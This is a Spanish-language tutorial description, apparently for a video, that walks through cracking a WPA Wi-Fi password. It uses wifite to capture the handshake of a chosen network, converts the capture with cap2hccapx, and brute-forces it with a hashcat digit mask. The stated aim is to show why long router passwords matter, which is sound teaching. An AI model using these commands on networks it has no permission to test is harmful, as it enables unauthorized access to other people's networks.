Tutorial - Wifite y Hashcat

Tutorial - Wifite y Hashcat
Este video veremos la importancia de asegurar tu red inalambrica con un password de por lo menos 16 caracteres diferente al password predeterminado de tu router inalambrico. Descripcion de Hashcat: hashcat es la herramienta de recuperación de contraseñas más rápida y avanzada del mundo. Esta versión combina el hashcat anterior basado en CPU (ahora llamado hashcat-legacy) y oclHashcat basado en GPU. Hashcat se lanza como software de código abierto bajo la licencia MIT. Enlace de descarga de Hashcat: https://ift.tt/1Ni2UaJ Enlace de Wiki para Hashcat: https://ift.tt/3joqKZU Paso 1 - Obtener el handshake de la red inalambrica Comandos: 1.- sudo wifite --wpa --kill Presiona CTRL+C para parar el Scan* 2.- Selecciona la rede inalambrica que deseas atacar Presiona CTRL+C para parar los tipos de ataques no deseados* Precion C para continuar con el siguiente ataque* El unico ataque que vamos a utilizar es WPA Handshake capture* Una vez que el handshake ha sido encontrado: 3.- LS para mostrar los archivos disponibles Una carpeta llamado "hs" debe estar ahora disponible 4.- cd hs 5.- ls El archivo dentro de esta carpeta es el handshake Ejemplo: ATTQKQwea2.cap Paso 2 - Convierte el archivo de captura en un formato adecuado para hashcat Comandos: 1.- sudo /usr/share/hashcat-utils/cap2hccapx.bin (nombre del archivo CAP) wpa2.hccapx 2.- ls Revisa que el nuevo archivo con la handshake este alli Copea este archivo a tu computadora con Windows Paso 3 - Ataque de fuerza bruta 1.- Descarga Hashcat 2.- Descomprime Hashcat 2.- Abre una ventana de CMD 3.- Navega hacia el directorio de Hashcat 4.- hashcat.exe -I Esto te mostrara los GPUs disponibles para utilizar con este ataque 5.- hashcat.exe -m 2500 -a 3 wpa2.hccapx ?d?d?d?d?d?d?d? (2500 especifica el tipo de handshake *wpa* / -a 3 especifica el tipo de ataque Fuerza Bruta / el numero de pares de "?d" especifica el numero de caracteres *en este caso lo limitaremos a 8* Puedes presionar "S" para verificat el status 6.- Una vez que el password sea encontrado puedes abrir el archivo "hashcat.potfile" con un editor de texto para ver el password

Comments